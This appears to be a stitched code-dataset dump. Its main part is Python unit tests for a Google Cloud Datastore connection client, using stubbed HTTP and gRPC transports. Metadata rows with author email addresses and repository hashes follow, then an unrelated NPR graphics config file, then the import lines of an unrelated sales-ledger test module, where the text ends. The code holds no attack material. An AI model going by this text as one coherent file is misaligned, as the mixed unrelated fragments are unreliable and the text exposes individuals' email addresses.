    def test_commit_failure_non_grpc_err(self):
        exc = RuntimeError('Not a gRPC error')
        self._commit_failure_helper(exc, RuntimeError)
    def test_rollback(self):
        return_val = object()
        stub = _GRPCStub(return_val)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        result = datastore_api.rollback(project, request_pb)
        self.assertIs(result, return_val)
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(stub.method_calls,
                         [(request_pb, 'Rollback')])
    def test_allocate_ids(self):
        return_val = object()
        stub = _GRPCStub(return_val)
        datastore_api = self._makeOne(stub=stub)
        request_pb = _RequestPB()
        project = 'PROJECT'
        result = datastore_api.allocate_ids(project, request_pb)
        self.assertIs(result, return_val)
        self.assertEqual(request_pb.project_id, project)
        self.assertEqual(
            stub.method_calls,
            [(request_pb, 'AllocateIds')])
class TestConnection(unittest.TestCase):
    """End-to-end tests for ``Connection`` over the stubbed HTTP transport.

    Pattern used by the RPC tests: serialize a canned protobuf response
    into a fake ``Http``, invoke the connection method, then parse the
    recorded request body back into the request protobuf and assert on
    exactly what would have been sent over the wire.
    """
    def _getTargetClass(self):
        from google.cloud.datastore.connection import Connection
        return Connection
    def _make_key_pb(self, project, id_=1234):
        # Build a one-element ('Kind', id_) key protobuf; id_=None leaves
        # the key partial (no trailing id) for allocate-ids tests.
        from google.cloud.datastore.key import Key
        path_args = ('Kind',)
        if id_ is not None:
            path_args += (id_,)
        return Key(*path_args, project=project).to_protobuf()
    def _make_query_pb(self, kind):
        from google.cloud.datastore._generated import query_pb2
        pb = query_pb2.Query()
        pb.kind.add().name = kind
        return pb
    def _makeOne(self, credentials=None, http=None, use_grpc=False):
        # Pin the HTTP/gRPC switch for the duration of construction.
        from unit_tests._testing import _Monkey
        from google.cloud.datastore import connection as MUT
        with _Monkey(MUT, _USE_GRPC=use_grpc):
            return self._getTargetClass()(credentials=credentials, http=http)
    def _verifyProtobufCall(self, called_with, URI, conn):
        # Shared assertions for every protobuf-over-HTTP request.
        self.assertEqual(called_with['uri'], URI)
        self.assertEqual(called_with['method'], 'POST')
        self.assertEqual(called_with['headers']['Content-Type'],
                         'application/x-protobuf')
        self.assertEqual(called_with['headers']['User-Agent'],
                         conn.USER_AGENT)
    def test_default_url(self):
        klass = self._getTargetClass()
        conn = self._makeOne()
        self.assertEqual(conn.api_base_url, klass.API_BASE_URL)
    def test_custom_url_from_env(self):
        # GCD_HOST in the environment redirects the API base URL.
        import os
        from unit_tests._testing import _Monkey
        from google.cloud.connection import API_BASE_URL
        from google.cloud.environment_vars import GCD_HOST
        HOST = 'CURR_HOST'
        fake_environ = {GCD_HOST: HOST}
        with _Monkey(os, environ=fake_environ):
            conn = self._makeOne()
        self.assertNotEqual(conn.api_base_url, API_BASE_URL)
        self.assertEqual(conn.api_base_url, 'http://' + HOST)
    def test_ctor_defaults(self):
        conn = self._makeOne()
        self.assertEqual(conn.credentials, None)
    def test_ctor_without_grpc(self):
        from unit_tests._testing import _Monkey
        from google.cloud.datastore import connection as MUT
        connections = []
        return_val = object()
        def mock_api(connection):
            connections.append(connection)
            return return_val
        with _Monkey(MUT, _DatastoreAPIOverHttp=mock_api):
            conn = self._makeOne(use_grpc=False)
        self.assertEqual(conn.credentials, None)
        self.assertIs(conn._datastore_api, return_val)
        self.assertEqual(connections, [conn])
    def test_ctor_with_grpc(self):
        from unit_tests._testing import _Monkey
        from google.cloud.datastore import connection as MUT
        api_args = []
        return_val = object()
        def mock_api(connection, secure):
            api_args.append((connection, secure))
            return return_val
        with _Monkey(MUT, _DatastoreAPIOverGRPC=mock_api):
            conn = self._makeOne(use_grpc=True)
        self.assertEqual(conn.credentials, None)
        self.assertIs(conn._datastore_api, return_val)
        self.assertEqual(api_args, [(conn, True)])
    def test_ctor_explicit(self):
        class Creds(object):
            def create_scoped_required(self):
                return False
        creds = Creds()
        conn = self._makeOne(creds)
        self.assertTrue(conn.credentials is creds)
    def test_http_w_existing(self):
        conn = self._makeOne()
        conn._http = http = object()
        self.assertTrue(conn.http is http)
    def test_http_wo_creds(self):
        import httplib2
        conn = self._makeOne()
        self.assertTrue(isinstance(conn.http, httplib2.Http))
    def test_http_w_creds(self):
        # With credentials, .http must be whatever authorize() returns.
        import httplib2
        authorized = object()
        class Creds(object):
            def authorize(self, http):
                self._called_with = http
                return authorized
            def create_scoped_required(self):
                return False
        creds = Creds()
        conn = self._makeOne(creds)
        self.assertTrue(conn.http is authorized)
        self.assertTrue(isinstance(creds._called_with, httplib2.Http))
    def test_build_api_url_w_default_base_version(self):
        PROJECT = 'PROJECT'
        METHOD = 'METHOD'
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':' + METHOD,
        ])
        self.assertEqual(conn.build_api_url(PROJECT, METHOD), URI)
    def test_build_api_url_w_explicit_base_version(self):
        BASE = 'http://example.com/'
        VER = '3.1415926'
        PROJECT = 'PROJECT'
        METHOD = 'METHOD'
        conn = self._makeOne()
        URI = '/'.join([
            BASE,
            VER,
            'projects',
            PROJECT + ':' + METHOD,
        ])
        self.assertEqual(conn.build_api_url(PROJECT, METHOD, BASE, VER),
                         URI)
    def test_lookup_single_key_empty_response(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        key_pb = self._make_key_pb(PROJECT)
        rsp_pb = datastore_pb2.LookupResponse()
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        found, missing, deferred = conn.lookup(PROJECT, [key_pb])
        self.assertEqual(len(found), 0)
        self.assertEqual(len(missing), 0)
        self.assertEqual(len(deferred), 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 1)
        self.assertEqual(key_pb, keys[0])
    def test_lookup_single_key_empty_response_w_eventual(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        key_pb = self._make_key_pb(PROJECT)
        rsp_pb = datastore_pb2.LookupResponse()
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        found, missing, deferred = conn.lookup(PROJECT, [key_pb],
                                               eventual=True)
        self.assertEqual(len(found), 0)
        self.assertEqual(len(missing), 0)
        self.assertEqual(len(deferred), 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 1)
        self.assertEqual(key_pb, keys[0])
        # eventual=True must set EVENTUAL consistency and no transaction.
        self.assertEqual(request.read_options.read_consistency,
                         datastore_pb2.ReadOptions.EVENTUAL)
        self.assertEqual(request.read_options.transaction, b'')
    def test_lookup_single_key_empty_response_w_eventual_and_transaction(self):
        # eventual consistency and a transaction are mutually exclusive.
        PROJECT = 'PROJECT'
        TRANSACTION = b'TRANSACTION'
        key_pb = self._make_key_pb(PROJECT)
        conn = self._makeOne()
        self.assertRaises(ValueError, conn.lookup, PROJECT, key_pb,
                          eventual=True, transaction_id=TRANSACTION)
    def test_lookup_single_key_empty_response_w_transaction(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        TRANSACTION = b'TRANSACTION'
        key_pb = self._make_key_pb(PROJECT)
        rsp_pb = datastore_pb2.LookupResponse()
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        found, missing, deferred = conn.lookup(PROJECT, [key_pb],
                                               transaction_id=TRANSACTION)
        self.assertEqual(len(found), 0)
        self.assertEqual(len(missing), 0)
        self.assertEqual(len(deferred), 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 1)
        self.assertEqual(key_pb, keys[0])
        self.assertEqual(request.read_options.transaction, TRANSACTION)
    def test_lookup_single_key_nonempty_response(self):
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import entity_pb2
        PROJECT = 'PROJECT'
        key_pb = self._make_key_pb(PROJECT)
        rsp_pb = datastore_pb2.LookupResponse()
        entity = entity_pb2.Entity()
        entity.key.CopyFrom(key_pb)
        rsp_pb.found.add(entity=entity)
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        (found,), missing, deferred = conn.lookup(PROJECT, [key_pb])
        self.assertEqual(len(missing), 0)
        self.assertEqual(len(deferred), 0)
        self.assertEqual(found.key.path[0].kind, 'Kind')
        self.assertEqual(found.key.path[0].id, 1234)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 1)
        self.assertEqual(key_pb, keys[0])
    def test_lookup_multiple_keys_empty_response(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        key_pb1 = self._make_key_pb(PROJECT)
        key_pb2 = self._make_key_pb(PROJECT, id_=2345)
        rsp_pb = datastore_pb2.LookupResponse()
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        found, missing, deferred = conn.lookup(PROJECT, [key_pb1, key_pb2])
        self.assertEqual(len(found), 0)
        self.assertEqual(len(missing), 0)
        self.assertEqual(len(deferred), 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 2)
        self.assertEqual(key_pb1, keys[0])
        self.assertEqual(key_pb2, keys[1])
    def test_lookup_multiple_keys_w_missing(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        key_pb1 = self._make_key_pb(PROJECT)
        key_pb2 = self._make_key_pb(PROJECT, id_=2345)
        rsp_pb = datastore_pb2.LookupResponse()
        er_1 = rsp_pb.missing.add()
        er_1.entity.key.CopyFrom(key_pb1)
        er_2 = rsp_pb.missing.add()
        er_2.entity.key.CopyFrom(key_pb2)
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        result, missing, deferred = conn.lookup(PROJECT, [key_pb1, key_pb2])
        self.assertEqual(result, [])
        self.assertEqual(len(deferred), 0)
        self.assertEqual([missed.key for missed in missing],
                         [key_pb1, key_pb2])
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 2)
        self.assertEqual(key_pb1, keys[0])
        self.assertEqual(key_pb2, keys[1])
    def test_lookup_multiple_keys_w_deferred(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        key_pb1 = self._make_key_pb(PROJECT)
        key_pb2 = self._make_key_pb(PROJECT, id_=2345)
        rsp_pb = datastore_pb2.LookupResponse()
        rsp_pb.deferred.add().CopyFrom(key_pb1)
        rsp_pb.deferred.add().CopyFrom(key_pb2)
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':lookup',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        result, missing, deferred = conn.lookup(PROJECT, [key_pb1, key_pb2])
        self.assertEqual(result, [])
        self.assertEqual(len(missing), 0)
        self.assertEqual([def_key for def_key in deferred], [key_pb1, key_pb2])
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        self.assertEqual(cw['uri'], URI)
        self.assertEqual(cw['method'], 'POST')
        self.assertEqual(cw['headers']['Content-Type'],
                         'application/x-protobuf')
        self.assertEqual(cw['headers']['User-Agent'], conn.USER_AGENT)
        rq_class = datastore_pb2.LookupRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        keys = list(request.keys)
        self.assertEqual(len(keys), 2)
        self.assertEqual(key_pb1, keys[0])
        self.assertEqual(key_pb2, keys[1])
    def test_run_query_w_eventual_no_transaction(self):
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import query_pb2
        PROJECT = 'PROJECT'
        KIND = 'Nonesuch'
        CURSOR = b'\x00'
        q_pb = self._make_query_pb(KIND)
        rsp_pb = datastore_pb2.RunQueryResponse()
        rsp_pb.batch.end_cursor = CURSOR
        no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
        rsp_pb.batch.more_results = no_more
        rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':runQuery',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        pbs, end, more, skipped = conn.run_query(PROJECT, q_pb,
                                                 eventual=True)
        self.assertEqual(pbs, [])
        self.assertEqual(end, CURSOR)
        self.assertTrue(more)
        self.assertEqual(skipped, 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.RunQueryRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(request.partition_id.namespace_id, '')
        self.assertEqual(request.query, q_pb)
        self.assertEqual(request.read_options.read_consistency,
                         datastore_pb2.ReadOptions.EVENTUAL)
        self.assertEqual(request.read_options.transaction, b'')
    def test_run_query_wo_eventual_w_transaction(self):
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import query_pb2
        PROJECT = 'PROJECT'
        KIND = 'Nonesuch'
        CURSOR = b'\x00'
        TRANSACTION = b'TRANSACTION'
        q_pb = self._make_query_pb(KIND)
        rsp_pb = datastore_pb2.RunQueryResponse()
        rsp_pb.batch.end_cursor = CURSOR
        no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
        rsp_pb.batch.more_results = no_more
        rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':runQuery',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        pbs, end, more, skipped = conn.run_query(
            PROJECT, q_pb, transaction_id=TRANSACTION)
        self.assertEqual(pbs, [])
        self.assertEqual(end, CURSOR)
        self.assertTrue(more)
        self.assertEqual(skipped, 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.RunQueryRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(request.partition_id.namespace_id, '')
        self.assertEqual(request.query, q_pb)
        self.assertEqual(
            request.read_options.read_consistency,
            datastore_pb2.ReadOptions.READ_CONSISTENCY_UNSPECIFIED)
        self.assertEqual(request.read_options.transaction, TRANSACTION)
    def test_run_query_w_eventual_and_transaction(self):
        # As with lookup: eventual + transaction must raise.
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import query_pb2
        PROJECT = 'PROJECT'
        KIND = 'Nonesuch'
        CURSOR = b'\x00'
        TRANSACTION = b'TRANSACTION'
        q_pb = self._make_query_pb(KIND)
        rsp_pb = datastore_pb2.RunQueryResponse()
        rsp_pb.batch.end_cursor = CURSOR
        no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
        rsp_pb.batch.more_results = no_more
        rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
        conn = self._makeOne()
        self.assertRaises(ValueError, conn.run_query, PROJECT, q_pb,
                          eventual=True, transaction_id=TRANSACTION)
    def test_run_query_wo_namespace_empty_result(self):
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import query_pb2
        PROJECT = 'PROJECT'
        KIND = 'Nonesuch'
        CURSOR = b'\x00'
        q_pb = self._make_query_pb(KIND)
        rsp_pb = datastore_pb2.RunQueryResponse()
        rsp_pb.batch.end_cursor = CURSOR
        no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
        rsp_pb.batch.more_results = no_more
        rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':runQuery',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        pbs, end, more, skipped = conn.run_query(PROJECT, q_pb)
        self.assertEqual(pbs, [])
        self.assertEqual(end, CURSOR)
        self.assertTrue(more)
        self.assertEqual(skipped, 0)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.RunQueryRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(request.partition_id.namespace_id, '')
        self.assertEqual(request.query, q_pb)
    def test_run_query_w_namespace_nonempty_result(self):
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import entity_pb2
        PROJECT = 'PROJECT'
        KIND = 'Kind'
        entity = entity_pb2.Entity()
        q_pb = self._make_query_pb(KIND)
        rsp_pb = datastore_pb2.RunQueryResponse()
        rsp_pb.batch.entity_results.add(entity=entity)
        rsp_pb.batch.entity_result_type = 1  # FULL
        rsp_pb.batch.more_results = 3  # NO_MORE_RESULTS
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':runQuery',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        pbs = conn.run_query(PROJECT, q_pb, 'NS')[0]
        self.assertEqual(len(pbs), 1)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.RunQueryRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(request.partition_id.namespace_id, 'NS')
        self.assertEqual(request.query, q_pb)
    def test_begin_transaction(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        TRANSACTION = b'TRANSACTION'
        rsp_pb = datastore_pb2.BeginTransactionResponse()
        rsp_pb.transaction = TRANSACTION
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':beginTransaction',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        self.assertEqual(conn.begin_transaction(PROJECT), TRANSACTION)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.BeginTransactionRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
    def test_commit_wo_transaction(self):
        from unit_tests._testing import _Monkey
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore import connection as MUT
        from google.cloud.datastore.helpers import _new_value_pb
        PROJECT = 'PROJECT'
        key_pb = self._make_key_pb(PROJECT)
        rsp_pb = datastore_pb2.CommitResponse()
        req_pb = datastore_pb2.CommitRequest()
        mutation = req_pb.mutations.add()
        insert = mutation.upsert
        insert.key.CopyFrom(key_pb)
        value_pb = _new_value_pb(insert, 'foo')
        value_pb.string_value = u'Foo'
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':commit',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        # Set up mock for parsing the response.
        expected_result = object()
        _parsed = []
        def mock_parse(response):
            _parsed.append(response)
            return expected_result
        with _Monkey(MUT, _parse_commit_response=mock_parse):
            result = conn.commit(PROJECT, req_pb, None)
        self.assertTrue(result is expected_result)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.CommitRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        # No transaction id -> NON_TRANSACTIONAL mode on the wire.
        self.assertEqual(request.transaction, b'')
        self.assertEqual(list(request.mutations), [mutation])
        self.assertEqual(request.mode, rq_class.NON_TRANSACTIONAL)
        self.assertEqual(_parsed, [rsp_pb])
    def test_commit_w_transaction(self):
        from unit_tests._testing import _Monkey
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore import connection as MUT
        from google.cloud.datastore.helpers import _new_value_pb
        PROJECT = 'PROJECT'
        key_pb = self._make_key_pb(PROJECT)
        rsp_pb = datastore_pb2.CommitResponse()
        req_pb = datastore_pb2.CommitRequest()
        mutation = req_pb.mutations.add()
        insert = mutation.upsert
        insert.key.CopyFrom(key_pb)
        value_pb = _new_value_pb(insert, 'foo')
        value_pb.string_value = u'Foo'
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':commit',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        # Set up mock for parsing the response.
        expected_result = object()
        _parsed = []
        def mock_parse(response):
            _parsed.append(response)
            return expected_result
        with _Monkey(MUT, _parse_commit_response=mock_parse):
            result = conn.commit(PROJECT, req_pb, b'xact')
        self.assertTrue(result is expected_result)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.CommitRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        # Transaction id present -> TRANSACTIONAL mode on the wire.
        self.assertEqual(request.transaction, b'xact')
        self.assertEqual(list(request.mutations), [mutation])
        self.assertEqual(request.mode, rq_class.TRANSACTIONAL)
        self.assertEqual(_parsed, [rsp_pb])
    def test_rollback_ok(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        TRANSACTION = b'xact'
        rsp_pb = datastore_pb2.RollbackResponse()
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':rollback',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        self.assertEqual(conn.rollback(PROJECT, TRANSACTION), None)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.RollbackRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(request.transaction, TRANSACTION)
    def test_allocate_ids_empty(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        rsp_pb = datastore_pb2.AllocateIdsResponse()
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':allocateIds',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        self.assertEqual(conn.allocate_ids(PROJECT, []), [])
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.AllocateIdsRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(list(request.keys), [])
    def test_allocate_ids_non_empty(self):
        from google.cloud.datastore._generated import datastore_pb2
        PROJECT = 'PROJECT'
        # Partial keys go in; complete keys come back.
        before_key_pbs = [
            self._make_key_pb(PROJECT, id_=None),
            self._make_key_pb(PROJECT, id_=None),
        ]
        after_key_pbs = [
            self._make_key_pb(PROJECT),
            self._make_key_pb(PROJECT, id_=2345),
        ]
        rsp_pb = datastore_pb2.AllocateIdsResponse()
        rsp_pb.keys.add().CopyFrom(after_key_pbs[0])
        rsp_pb.keys.add().CopyFrom(after_key_pbs[1])
        conn = self._makeOne()
        URI = '/'.join([
            conn.api_base_url,
            conn.API_VERSION,
            'projects',
            PROJECT + ':allocateIds',
        ])
        http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
        self.assertEqual(conn.allocate_ids(PROJECT, before_key_pbs),
                         after_key_pbs)
        cw = http._called_with
        self._verifyProtobufCall(cw, URI, conn)
        rq_class = datastore_pb2.AllocateIdsRequest
        request = rq_class()
        request.ParseFromString(cw['body'])
        self.assertEqual(len(request.keys), len(before_key_pbs))
        for key_before, key_after in zip(before_key_pbs, request.keys):
            self.assertEqual(key_before, key_after)
class Test__parse_commit_response(unittest.TestCase):
    """Verify a CommitResponse is reduced to ``(index_updates, keys)``."""
    def _callFUT(self, commit_response_pb):
        from google.cloud.datastore.connection import _parse_commit_response
        return _parse_commit_response(commit_response_pb)
    def test_it(self):
        from google.cloud.datastore._generated import datastore_pb2
        from google.cloud.datastore._generated import entity_pb2
        index_updates = 1337
        # One numeric-id key and one named key, to cover both path forms.
        keys = [
            entity_pb2.Key(
                path=[
                    entity_pb2.Key.PathElement(
                        kind='Foo',
                        id=1234,
                    ),
                ],
            ),
            entity_pb2.Key(
                path=[
                    entity_pb2.Key.PathElement(
                        kind='Bar',
                        name='baz',
                    ),
                ],
            ),
        ]
        response = datastore_pb2.CommitResponse(
            mutation_results=[
                datastore_pb2.MutationResult(key=key) for key in keys
            ],
            index_updates=index_updates,
        )
        result = self._callFUT(response)
        self.assertEqual(result, (index_updates, keys))
class Http(object):
    """Test double for ``httplib2.Http`` returning one canned response.

    The keyword arguments of the most recent ``request()`` call are kept
    in ``_called_with`` so tests can assert on URI, method, headers, body.
    """
    _called_with = None
    def __init__(self, headers, content):
        from httplib2 import Response
        self._response = Response(headers)
        self._content = content
    def request(self, **kw):
        self._called_with = kw
        return self._response, self._content
class _Connection(object):
    """Minimal connection double.

    Every ``build_api_url`` call has its keyword arguments recorded in
    ``build_kwargs`` and is answered with the URL fixed at construction.
    """
    host = None
    USER_AGENT = 'you-sir-age-int'
    def __init__(self, api_url):
        self.build_kwargs = []
        self.api_url = api_url
    def build_api_url(self, **kwargs):
        self.build_kwargs += [kwargs]
        return self.api_url
class _GRPCStub(object):
    """Fake gRPC datastore stub recording ``(request, method-name)`` pairs.

    Every RPC returns ``return_val``.  ``Commit`` additionally raises
    ``side_effect`` unless it is left at the sentinel default (the
    ``Exception`` class object itself).
    """
    def __init__(self, return_val=None, side_effect=Exception):
        self.method_calls = []
        self.return_val = return_val
        self.side_effect = side_effect
    def _method(self, request_pb, name):
        self.method_calls.append((request_pb, name))
        return self.return_val
    def Lookup(self, request_pb):
        return self._method(request_pb, 'Lookup')
    def RunQuery(self, request_pb):
        return self._method(request_pb, 'RunQuery')
    def BeginTransaction(self, request_pb):
        return self._method(request_pb, 'BeginTransaction')
    def Commit(self, request_pb):
        outcome = self._method(request_pb, 'Commit')
        # Guard clause: only the sentinel default means "succeed".
        if self.side_effect is not Exception:
            raise self.side_effect
        return outcome
    def Rollback(self, request_pb):
        return self._method(request_pb, 'Rollback')
    def AllocateIds(self, request_pb):
        return self._method(request_pb, 'AllocateIds')
class _RequestPB(object):
    """Request-protobuf double exposing the ``project_id`` slot the
    transport layer is expected to fill in."""
    project_id = None
| [
"varnachandar16@gmail.com"
] | varnachandar16@gmail.com |
6a192ce3a780e557a221c647cf70d5ce37cf901d | 78f3fe4a148c86ce9b80411a3433a49ccfdc02dd | /2017/06/trump-approval-20170601/graphic_config.py | ff3ca865581af3ab3dd6555df9e94d562b335301 | [] | no_license | nprapps/graphics-archive | 54cfc4d4d670aca4d71839d70f23a8bf645c692f | fe92cd061730496cb95c9df8fa624505c3b291f8 | refs/heads/master | 2023-03-04T11:35:36.413216 | 2023-02-26T23:26:48 | 2023-02-26T23:26:48 | 22,472,848 | 16 | 7 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | #!/usr/bin/env python
import base_filters
# Identifier of the Google doc backing this graphic's copy text
# (assumed from the name -- verify against the copytext tooling).
COPY_GOOGLE_DOC_KEY = '1g0Lnpdt7bS8_NDHxYVFOQ54vuxPCkKqdIPdlWZG3O6Q'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
# Expose the shared Jinja filters to the template renderer.
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| [
"ahurt@npr.org"
] | ahurt@npr.org |
a0022e5aad78fa4298fd81dba90deb62577f9337 | 3109aaf72df47f11742aca1c5921f71e03eb9917 | /sales/testing/test_integration/test_credit_note.py | 91d91efad38cf58cf894e057d434c41542c24b3f | [
"MIT"
] | permissive | kofi-teddy/accounts | a225f5639ef8993934fe69ec638d2af19d854c2d | 74633ce4038806222048d85ef9dfe97a957a6a71 | refs/heads/master | 2023-02-19T15:10:20.621628 | 2021-01-23T10:30:27 | 2021-01-23T10:30:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256,343 | py | from datetime import date, datetime, timedelta
from json import loads
from accountancy.helpers import sort_multiple
from accountancy.testing.helpers import *
from cashbook.models import CashBook, CashBookTransaction
from controls.models import FinancialYear, ModuleSettings, Period
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from django.test import RequestFactory, TestCase
from django.utils import timezone
from nominals.models import Nominal, NominalTransaction
from sales.helpers import (create_credit_note_with_lines,
create_credit_note_with_nom_entries,
create_invoice_with_lines,
create_invoice_with_nom_entries, create_invoices,
create_lines, create_receipt_with_nom_entries,
create_receipts, create_refund_with_nom_entries,
create_vat_transactions)
from sales.models import Customer, SaleHeader, SaleLine, SaleMatching
